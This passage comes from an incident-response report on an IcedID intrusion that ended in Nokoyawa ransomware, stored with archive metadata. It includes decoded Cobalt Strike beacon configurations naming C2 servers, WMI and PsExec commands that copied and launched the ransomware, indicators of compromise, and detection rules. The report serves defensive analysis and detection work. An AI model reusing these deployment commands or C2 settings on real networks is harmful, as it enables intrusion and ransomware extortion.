\"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"http_post_chunk\": 0,\r\n \"uses_cookies\": true,\r\n \"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\regsvr32.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\regsvr32.exe\"\r\n },\r\n \"process-inject\": {\r\n \"allocator\": \"VirtualAllocEx\",\r\n \"execute\": [\r\n \"CreateThread\",\r\n \"RtlCreateUserThread\",\r\n \"CreateRemoteThread\"\r\n ],\r\n \"min_alloc\": 6133,\r\n \"startrwx\": false,\r\n \"stub\": \"tUr+Aexqde3zXhpE+L05KQ==\",\r\n \"transform-x86\": [\r\n \"prepend '\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90'\"\r\n ],\r\n \"transform-x64\": [\r\n \"prepend '\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90\\\\x90'\"\r\n ],\r\n \"userwx\": false\r\n },\r\n \"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": null,\r\n \"beacon\": null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\n \"put_metadata\": null,\r\n \"put_output\": null\r\n },\r\n \"pipename\": null,\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": true\r\n },\r\n \"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\nDomain IP Port JA3 JA3s\r\niconnectgs[.]com 50.3.132.232 8081 N/A N/A\r\n[{\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA\\u003d\\u003d\",\r\n \"pipename\": null,\r\n \"dns_beacon\": {\r\n \"put_metadata\": null,\r\n \"get_TXT\": null,\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 20 of 33\n\n\"get_AAAA\": null,\r\n \"get_A\": null,\r\n \"beacon\": null,\r\n \"maxdns\": null,\r\n \"dns_sleep\": null,\r\n \"put_output\": null,\r\n \"dns_idle\": null\r\n },\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"post_ex\": {\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\svchost.exe\",\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\svchost.exe\"\r\n },\r\n \"stage\": {\r\n \"cleanup\": \"true\"\r\n },\r\n \"process_inject\": {\r\n \"stub\": \"snNvHLupDUIob8Qr+6dPTQ\\u003d\\u003d\",\r\n \"transform_x64\": [\"prepend \\u0027\\\\x90\\\\x90\\\\x90\\\\x90\\u0027\"],\r\n \"transform_x86\": [\"prepend \\u0027\\\\x90\\\\x90\\\\x90\\\\x90\\u0027\"],\r\n \"startrwx\": \"false\",\r\n \"min_alloc\": \"5271\",\r\n \"userwx\": \"false\",\r\n \"execute\": [\"CreateThread\", \"RtlCreateUserThread\", \"CreateRemoteThread\"],\r\n \"allocator\": \"VirtualAllocEx\"\r\n },\r\n \"uses_cookies\": \"true\",\r\n \"http_post_chunk\": \"0\",\r\n \"ssh\": {\r\n \"privatekey\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"port\": null,\r\n \"hostname\": null\r\n },\r\n \"useragent_header\": null,\r\n \"maxgetsize\": \"1864478\",\r\n \"proxy\": {\r\n \"behavior\": \"Use IE settings\",\r\n \"password\": null,\r\n \"username\": null,\r\n \"type\": null\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"server\": {\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrr8AvQMH9nOuqc7x6r58gsuNMYuuRdKcMgo3iPMjQgM1u5BNXqKJB\r\n \"port\": \"8081\",\r\n \"hostname\": \"iconnectgs.com\"\r\n },\r\n \"beacontype\": [\"HTTP\"],\r\n \"kill_date\": null,\r\n \"license_id\": \"0\",\r\n \"jitter\": \"43\",\r\n \"sleeptime\": \"62004\",\r\n \"http_get\": {\r\n \"server\": {\r\n \"output\": [\"print\", \"prepend 338 characters\", \"base64\", \"base64\"]\r\n },\r\n \"client\": {\r\n \"metadata\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"GET\",\r\n \"uri\": \"/hr\"\r\n },\r\n \"cfg_caution\": \"false\",\r\n \"host_header\": \"\",\r\n \"crypto_scheme\": \"0\",\r\n \"http_post\": {\r\n \"client\": {\r\n \"output\": [],\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 21 of 33\n\n\"id\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"POST\",\r\n \"uri\": \"/mobile-home\"\r\n }\r\n}, {\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA\\u003d\\u003d\",\r\n \"pipename\": null,\r\n \"dns_beacon\": {\r\n \"put_metadata\": null,\r\n \"get_TXT\": null,\r\n \"get_AAAA\": null,\r\n \"get_A\": null,\r\n \"beacon\": null,\r\n \"maxdns\": null,\r\n \"dns_sleep\": null,\r\n \"put_output\": null,\r\n \"dns_idle\": null\r\n },\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"post_ex\": {\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\svchost.exe\",\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\svchost.exe\"\r\n },\r\n \"stage\": {\r\n \"cleanup\": \"true\"\r\n },\r\n \"process_inject\": {\r\n \"stub\": \"snNvHLupDUIob8Qr+6dPTQ\\u003d\\u003d\",\r\n \"transform_x64\": [\"prepend \\u0027\\\\x90\\\\x90\\\\x90\\\\x90\\u0027\"],\r\n \"transform_x86\": [\"prepend \\u0027\\\\x90\\\\x90\\\\x90\\\\x90\\u0027\"],\r\n \"startrwx\": \"false\",\r\n \"min_alloc\": \"5271\",\r\n \"userwx\": \"false\",\r\n \"execute\": [\"CreateThread\", \"RtlCreateUserThread\", \"CreateRemoteThread\"],\r\n \"allocator\": \"VirtualAllocEx\"\r\n },\r\n \"uses_cookies\": \"true\",\r\n \"http_post_chunk\": \"0\",\r\n \"ssh\": {\r\n \"privatekey\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"port\": null,\r\n \"hostname\": null\r\n },\r\n \"useragent_header\": null,\r\n \"maxgetsize\": \"1864478\",\r\n \"proxy\": {\r\n \"behavior\": \"Use IE settings\",\r\n \"password\": null,\r\n \"username\": null,\r\n \"type\": null\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"server\": {\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrr8AvQMH9nOuqc7x6r58gsuNMYuuRdKcMgo3iPMjQgM1u5BNXqKJB\r\n \"port\": \"8081\",\r\n \"hostname\": \"iconnectgs.com\"\r\n },\r\n \"beacontype\": [\"HTTP\"],\r\n \"kill_date\": null,\r\n \"license_id\": \"0\",\r\n \"jitter\": \"43\",\r\n \"sleeptime\": \"62004\",\r\n \"http_get\": {\r\n \"server\": {\r\n \"output\": [\"print\", \"prepend 338 characters\", \"base64\", \"base64\"]\r\n },\r\n \"client\": {\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 22 of 33\n\n\"metadata\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"GET\",\r\n \"uri\": \"/hr\"\r\n },\r\n \"cfg_caution\": \"false\",\r\n \"host_header\": \"\",\r\n \"crypto_scheme\": \"0\",\r\n \"http_post\": {\r\n \"client\": {\r\n \"output\": [],\r\n \"id\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"POST\",\r\n \"uri\": \"/mobile-home\"\r\n }\r\n}]\r\nDomain IP Port JA3 JA3s\r\nN/A 5.8.18.242 443 72a589da586844d7f0818ce684948eea f176ba63b4d68e576b5ba345bec2c7b7\r\n[{\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA\\u003d\\u003d\",\r\n \"pipename\": null,\r\n \"dns_beacon\": {\r\n \"put_metadata\": null,\r\n \"get_TXT\": null,\r\n \"get_AAAA\": null,\r\n \"get_A\": null,\r\n \"beacon\": null,\r\n \"maxdns\": null,\r\n \"dns_sleep\": null,\r\n \"put_output\": null,\r\n \"dns_idle\": null\r\n },\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"post_ex\": {\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\"\r\n },\r\n \"stage\": {\r\n \"cleanup\": \"false\"\r\n },\r\n \"process_inject\": {\r\n \"stub\": \"tUr+Aexqde3zXhpE+L05KQ\\u003d\\u003d\",\r\n \"transform_x64\": [],\r\n \"transform_x86\": [],\r\n \"startrwx\": \"true\",\r\n \"min_alloc\": \"0\",\r\n \"userwx\": \"true\",\r\n \"execute\": [\"CreateThread\", \"SetThreadContext\", \"CreateRemoteThread\", \"RtlCreateUserThread\"],\r\n \"allocator\": \"VirtualAllocEx\"\r\n },\r\n \"uses_cookies\": \"true\",\r\n \"http_post_chunk\": \"0\",\r\n \"ssh\": {\r\n \"privatekey\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"port\": null,\r\n \"hostname\": null\r\n },\r\n \"useragent_header\": null,\r\n \"maxgetsize\": \"1048576\",\r\n \"proxy\": {\r\n \"behavior\": \"Use IE settings\",\r\n \"password\": null,\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 23 of 33\n\n\"username\": null,\r\n \"type\": null\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"server\": {\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCnOM3nXx+7HBhkbDd+AwFrFisSunK999w2tM0uTpuuEiBalcJhcL+Q\r\n \"port\": \"80\",\r\n \"hostname\": \"5.8.18.242\"\r\n },\r\n \"beacontype\": [\"HTTP\"],\r\n \"kill_date\": null,\r\n \"license_id\": \"305419776\",\r\n \"jitter\": \"0\",\r\n \"sleeptime\": \"60000\",\r\n \"http_get\": {\r\n \"server\": {\r\n \"output\": [\"print\"]\r\n },\r\n \"client\": {\r\n \"metadata\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"GET\",\r\n \"uri\": \"/pixel.gif\"\r\n },\r\n \"cfg_caution\": \"false\",\r\n \"host_header\": \"\",\r\n \"crypto_scheme\": \"0\",\r\n \"http_post\": {\r\n \"client\": {\r\n \"output\": [],\r\n \"id\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"POST\",\r\n \"uri\": \"/submit.php\"\r\n }\r\n}, {\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA\\u003d\\u003d\",\r\n \"pipename\": null,\r\n \"dns_beacon\": {\r\n \"put_metadata\": null,\r\n \"get_TXT\": null,\r\n \"get_AAAA\": null,\r\n \"get_A\": null,\r\n \"beacon\": null,\r\n \"maxdns\": null,\r\n \"dns_sleep\": null,\r\n \"put_output\": null,\r\n \"dns_idle\": null\r\n },\r\n \"smb_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"post_ex\": {\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\rundll32.exe\",\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\rundll32.exe\"\r\n },\r\n \"stage\": {\r\n \"cleanup\": \"false\"\r\n },\r\n \"process_inject\": {\r\n \"stub\": \"tUr+Aexqde3zXhpE+L05KQ\\u003d\\u003d\",\r\n \"transform_x64\": [],\r\n \"transform_x86\": [],\r\n \"startrwx\": \"true\",\r\n \"min_alloc\": \"0\",\r\n \"userwx\": \"true\",\r\n \"execute\": [\"CreateThread\", \"SetThreadContext\", \"CreateRemoteThread\", \"RtlCreateUserThread\"],\r\n \"allocator\": \"VirtualAllocEx\"\r\n },\r\n \"uses_cookies\": \"true\",\r\n \"http_post_chunk\": \"0\",\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 24 of 33\n\n\"ssh\": {\r\n \"privatekey\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"port\": null,\r\n \"hostname\": null\r\n },\r\n \"useragent_header\": null,\r\n \"maxgetsize\": \"1048576\",\r\n \"proxy\": {\r\n \"behavior\": \"Use IE settings\",\r\n \"password\": null,\r\n \"username\": null,\r\n \"type\": null\r\n },\r\n \"tcp_frame_header\": \"AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"server\": {\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCnOM3nXx+7HBhkbDd+AwFrFisSunK999w2tM0uTpuuEiBalcJhcL+Q\r\n \"port\": \"443\",\r\n \"hostname\": \"5.8.18.242\"\r\n },\r\n \"beacontype\": [\"HTTPS\"],\r\n \"kill_date\": null,\r\n \"license_id\": \"305419776\",\r\n \"jitter\": \"0\",\r\n \"sleeptime\": \"60000\",\r\n \"http_get\": {\r\n \"server\": {\r\n \"output\": [\"print\"]\r\n },\r\n \"client\": {\r\n \"metadata\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"GET\",\r\n \"uri\": \"/dot.gif\"\r\n },\r\n \"cfg_caution\": \"false\",\r\n \"host_header\": \"\",\r\n \"crypto_scheme\": \"0\",\r\n \"http_post\": {\r\n \"client\": {\r\n \"output\": [],\r\n \"id\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"POST\",\r\n \"uri\": \"/submit.php\"\r\n }\r\n}]\r\nExfiltration\r\nDuring the intrusion, the threat actors targeted password documents on network shares. We observed these being taken and\r\nopened off network through the use of canaries. No overt exfiltration was observed so we assess that this occurred over\r\nexisting command and control channels.\r\nThe threat actors opened the document from the IP:\r\n45.61.139.126\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 25 of 33\n\nImpact\r\nThreat Actors deployed Nokoyawa ransomware from one of the servers using WMI and PsExec. They first copied the\r\nransomware binary,k.exe, and a batch script p.bat using WMI:\r\nwmic /node:\"TARGET_HOST_IP\" /user:\"DOMAIN\\USER\" /password:\"PASSWORD\" process call create \"cmd.exe /c copy \\\\SO\r\nCommand spawned by WmiPrvSE.exe:\r\ncmd.exe /c copy \\\\SOURCE_SERVER_IP\\c$\\windows\\temp\\k.exe c:\\windows\\temp\\\r\nA snippet of SMB network traffic generated by the above command:\r\nThe p.bat is a simple batch script that runs the k.exe binary with a Base64 encoded configuration:\r\nc:\\windows\\temp\\k.exe --config REDACTED\r\nThe redacted parameter used by the `–config` flag decodes to:\r\n{\"EXTENSION\": \"AWAYOKON\", \"NOTE_NAME\": \"AWAYOKON-readme.txt\", \"NOTE_CONTENT\": \"REDACTED\", \"ECC_PUBLIC\": \"lHrYQ\r\nThe decoded configuration file shows the ransomware extension, the note name, and the note content encoded in Base64.\r\nThe threat actors also configured a number of directories and extensions to skip, and enabled network and hidden drives\r\nencryption. The DELETE_SHADOW was set to true, in order to delete volume shadow copies.\r\nBased on the configuration parameters being passed via command line and the code written in C++, the deployment appears\r\nto be part of the 1.1 version of the Nokoyawa code base:\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 26 of 33\n\nRansomware sample code signature:\r\nDebug information shows that the binary was generated a few hours before the encryption:\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 27 of 33\n\nThe ransomware was then deployed at scale using PsExec to encrypt the Windows domain:\r\npsexec.exe \\\\TARGET_HOST_IP -u DOMAIN\\USER -p \"PASSWORD\" -s -d -h -r mstdc -accepteula -nobanner c:\\windows\\t\r\nA ransom message was left in each directory where files were encrypted.\r\nAfter encryption, contact was made with the threat actors using their support site and the price of the ransom was quoted at\r\n~$200,000 USD in Bitcoin. No ransom was paid as a result of this intrusion.\r\nTimeline\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 28 of 33\n\nDiamond Model\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 29 of 33\n\nIndicators\r\nAtomic\r\nCobalt Strike\r\n50.3.132[.]232:8081 / iconnectgs[.]com\r\n5.8.18[.]242:443\r\n23.29.115[.]152:757 / aicsoftware[.]com\r\n23.29.115[.]152:8080 / aicsoftware[.]com\r\nPowershell Cobalt Strike Downloader\r\nhttps://aicsoftware[.]com:757/coin\r\nIcedID Excel Download URL\r\nhttps://simipimi[.]com\r\nIcedID C2\r\nkicknocisd[.]com\r\n159.65.169[.]200\r\n45.66.248[.]119:443 / guaracheza[.]pics | belliecow[.]wiki\r\n198.244.180.66:443 / curabiebarristie[.]com | stayersa[.]art\r\nBackConnect\r\n137.74.104[.]108:8080\r\nComputed\r\n1.bat\r\nb5db398832461be8d93fdbda120088aa\r\nb36748a27b8e68710701286106ad434c9afea6fa\r\n30a334da51d22b2fe6e33970df8d0f81396394de9d3a3c224751aacb2202b0db\r\n1.dll\r\n9740f2b8aeacc180d32fc79c46333178\r\nc599c32d6674c01d65bff6c7710e94b6d1f36869\r\nd3db55cd5677b176eb837a536b53ed8c5eabbfd68f64b88dd083dc9ce9ffb64e\r\n4_202210250456866742.xls\r\nd3032968085db665381d9cbd3569f330\r\n9230520c6dd215e2152bb2e56b2a5d6b45ae8e13\r\neb84a283ff58906786d63ffe43a8ff2728584428f5f7d9972c664f63f8790113\r\n7030270\r\n964c94b217d102e53a227bcbc94ae52e\r\nb846e89d0f56851696d50b5e64c6e758ddae3e6a\r\n091886c95ca946aedee24b7c751b5067c5ac875923caba4d3cc9d961efadb65d\r\nk.exe\r\n40c9dc2897b6b348da88b23deb0d3952\r\n0f5457b123e60636623f585cc2bf2729f13a95d6\r\n7095beafff5837070a89407c1bf3c6acf8221ed786e0697f6c578d4c3de0efd6\r\nmstdc.exe\r\n7dae150c1df0e01467be3a743775b646\r\nf309b61a8b005b5ce0a3fb58caaa798cfc95f5db\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 30 of 33\n\n3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748\r\np.bat\r\n385d21c0438f5b21920aa9eb894740d2\r\n5d2c17799dfc6717f89cd5f63951829aed038041\r\ne351ba5e50743215e8e99b5f260671ca8766886f69d84eabb83e99d55884bc2f\r\nDetections\r\nNetwork\r\nET MALWARE Win32/IcedID Request Cookie\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)\r\nNF - Malware IcedID BackConnect - Wait Command\r\nNF - Malware IcedID BackConnect - Start VNC command - 11\r\nET MALWARE Meterpreter or Other Reverse Shell SSL Cert\r\nET HUNTING Suspicious Empty SSL Certificate - Observed in Cobalt Strike\r\nET MALWARE Cobalt Strike Malleable C2 Profile (__session__id Cookie)\r\nET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nET POLICY PsExec service created\r\nET POLICY SMB Executable File Transfer\r\nET POLICY SMB2 NT Create AndX Request For a .bat File\r\nET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement\r\nSigma\r\nSIGMA Project Repo\r\nNew Process Created Via Wmic.EXE id: 526be59f-a573-4eea-b5f7-f0973207634d\r\nPotential Recon Activity Via Nltest.EXE id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248\r\nCreated Files by Office Applications id: c7a74c80-ba5a-486e-9974-ab9e682bc5e4\r\nCobaltStrike Named Pipe id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2\r\nSuspicious Group And Account Reconnaissance Activity Using Net.EXE id: d95de845-b83c-4a9a-8a6a-4fc802ebf6c0\r\nPowerShell Download and Execution Cradles id: 85b0b087-eddf-4a2b-b033-d771fa2b9775\r\nMeterpreter or Cobalt Strike Getsystem Service Installation – Security id: ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34\r\nCredential Dumping Tools Accessing LSASS Memory id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d\r\nPotential Defense Evasion Via Rename Of Highly Relevant Binaries id: 0ba1da6d-b6ce-4366-828c-18826c9de23e\r\nDFIR Report Repo\r\nAdFind Discovery id: 50046619-1037-49d7-91aa-54fc92923604\r\nCHCP CodePage Locale Lookup id: dfbdd206-6cf2-4db9-93a6-0b7e14d5f02f\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/18190/18190.yar\r\nMITRE\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 31 of 33\n\nAccess Token Manipulation: Token Impersonation/Theft - T1134.001\r\nAccount Discovery: Local Account - T1087.001\r\nAccount Discovery: Domain Account - T1087.002\r\nApplication Layer Protocol: Web Protocols - T1071.001\r\nCommand and Scripting Interpreter: Windows Command Shell - T1059.003\r\nCommand-Line Interface: PowerShell - T1059.001\r\nCommand-Line Interface: Visual Basic - T1059.005\r\nData Encrypted for Impact - T1486\r\nDomain Trust Discovery - T1482\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 32 of 33\n\nFile and Directory Discovery - T1083\r\nIndicator Removal on Host: File Deletion - T1070.004\r\nMasquerading: Rename System Utilities - T1036.003\r\nPhishing: Spearphishing Attachment - T1566.001\r\nProcess Injection – T1055\r\nRemote Services: RDP - T1021.001\r\nRemote Services: SMB/Windows Admin Shares - T1021.002\r\nRemote System Discovery - T1018\r\nScheduled Task/Job: Scheduled Task - T1053.005\r\nSystem Binary Proxy Execution: Rundll32 - T1218.011\r\nSystem Network Configuration Discovery - T1016\r\nValid Accounts - T1078\r\nWMI - T1047\r\nUnsecured Credentials: Credentials In Files - T1552.001\r\nUser Execution: Malicious File - T1204.002\r\nRemote Services: Windows Remote Management - T1021.006\r\nExfiltration Over C2 Channel - T1041\r\nArchive Collected Data: Archive via Utility - T1560.001\r\nIngress Tool Transfer - T1105\r\nWeb Service - T1102\r\nOS Credential Dumping: LSASS Memory - T1003.001\r\nRemote Access Software - T1219\r\nAdFind - S0552\r\nIcedID - S0483\r\nipconfig - S0100\r\nnet - S0039\r\nnltest - S0359\r\nping - S0097\r\nsysteminfo - S0096\r\ncmd - S0106\r\nCobalt Strike - S0154\r\nPsExec - S0029\r\nInternal case #18190\r\nSource: https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\r\nPage 33 of 33\n\n https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/  \nRansomware sample code signature:  \nDebug information shows that the binary was generated a few hours before the encryption:\n  Page 27 of 33",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/"
	],
	"report_names": [
		"icedid-macro-ends-in-nokoyawa-ransomware"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20c759c2-cd02-45bb-85c6-41bde9e6a7cf",
			"created_at": "2024-01-18T02:02:34.189827Z",
			"updated_at": "2026-04-10T02:00:04.721082Z",
			"deleted_at": null,
			"main_name": "HomeLand Justice",
			"aliases": [
				"Banished Kitten",
				"Karma",
				"Red Sandstorm",
				"Storm-0842",
				"Void Manticore"
			],
			"source_name": "ETDA:HomeLand Justice",
			"tools": [
				"BABYWIPER",
				"BiBi Wiper",
				"BiBi-Linux Wiper",
				"BiBi-Windows Wiper",
				"Cl Wiper",
				"LowEraser",
				"No-Justice Wiper",
				"Plink",
				"PuTTY Link",
				"RevSocks",
				"W2K Res Kit"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434032,
	"ts_updated_at": 1775826783,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3daa55dde07770e30de74e806c4c0411f30aecbc.pdf",
		"text": "https://archive.orkl.eu/3daa55dde07770e30de74e806c4c0411f30aecbc.txt",
		"img": "https://archive.orkl.eu/3daa55dde07770e30de74e806c4c0411f30aecbc.jpg"
	}
}